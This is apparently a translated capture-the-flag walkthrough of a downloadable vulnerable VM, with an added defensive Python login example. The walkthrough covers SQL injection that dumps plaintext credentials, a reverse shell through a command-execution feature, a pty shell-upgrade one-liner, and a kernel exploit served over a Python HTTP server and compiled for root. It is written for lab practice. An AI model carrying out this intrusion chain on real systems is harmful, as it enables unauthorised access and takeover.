For learning and exchange only; do not use for illegal purposes.
Environment setup
No fuss: download it, open it in a virtual machine and you're ready.
Identify the target
![](https://img.haomeiwen.com/i17716535/c7b4debdf8e82dc4.png)
Port scan
![](https://img.haomeiwen.com/i17716535/31f05b65595e8046.png)
Identify assets
- Port 80 runs a web service
Find vulnerabilities
- Packet capture analysis confirms a SQL injection vulnerability
- Obtain account credentials

```
Database: webapp
Table: users
[2 entries]
+----------+------------+
| username | password   |
+----------+------------+
| admin    | 5afac8d85f |
| john     | 66lajGGbla |
+----------+------------+
```
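As an added example that is not part of the original writeup: the dump above shows two weaknesses at once, a login query that accepts injected input and passwords stored in plaintext. The Python login below (sqlite3 in memory as an assumed stand-in for the `webapp` database's `users` table; the rows are constructed sample data) fixes both with a parameterised lookup, so the username is bound as data, and salted PBKDF2 hashes compared in constant time.

```python
import hashlib
import hmac
import os
import sqlite3

# PBKDF2-HMAC-SHA256 work factor (stdlib only, no third-party dependency).
PBKDF2_ITERATIONS = 200_000


def hash_password(password: str, salt: bytes = b"") -> str:
    """Return 'salt_hex$hash_hex' for storage; a random salt is generated if none is given."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)


# Dummy record so a lookup for an unknown user costs the same as a wrong password.
_DUMMY_RECORD = hash_password("")


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the 'webapp' users table, storing hashes instead of plaintext."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT NOT NULL)")
    for user, pw in (("admin", "5afac8d85f"), ("john", "66lajGGbla")):  # constructed sample rows
        conn.execute("INSERT INTO users VALUES (?, ?)", (user, hash_password(pw)))
    return conn


def login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised lookup: quotes or SQL keywords in the username cannot alter the statement."""
    row = conn.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        verify_password(password, _DUMMY_RECORD)  # burn the same time, then reject
        return False
    return verify_password(password, row[0])
```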
Log in as a user
- After logging in we find a command-execution function
![](https://img.haomeiwen.com/i17716535/f920929c81d4b0aa.png)
Get a shell
- Spawn a reverse shell directly
Get an interactive shell
`python -c 'import pty;pty.spawn("/bin/sh")'`
Privilege escalation
`lsb_release -a`
![](https://img.haomeiwen.com/i17716535/49564b95fd09ce70.png)
Search for a usable exploit
![](https://img.haomeiwen.com/i17716535/5523c16c0fb88a38.png)
- The question now is how to get the exploit onto the server.
Set up a simple server
- `python3 -m http.server 2222` starts a simple HTTP server on that port for the target to download from
![](https://img.haomeiwen.com/i17716535/3b65fa7408aa3471.png)
- The current directory is not writable, so switch to /tmp
![](https://img.haomeiwen.com/i17716535/782009f8cf46120c.png)
Compile the exploit
`gcc -o 9542 9542.c`
![](https://img.haomeiwen.com/i17716535/3f2522ced4057a2c.png)
Compiled successfully; run the exploit
![](https://img.haomeiwen.com/i17716535/1022cb97bb6bd759.png)
With root obtained, change the password
![](https://img.haomeiwen.com/i17716535/65f8c086d8be54e1.png)
Log in to the server
![](https://img.haomeiwen.com/i17716535/68f8f933395a6b99.png)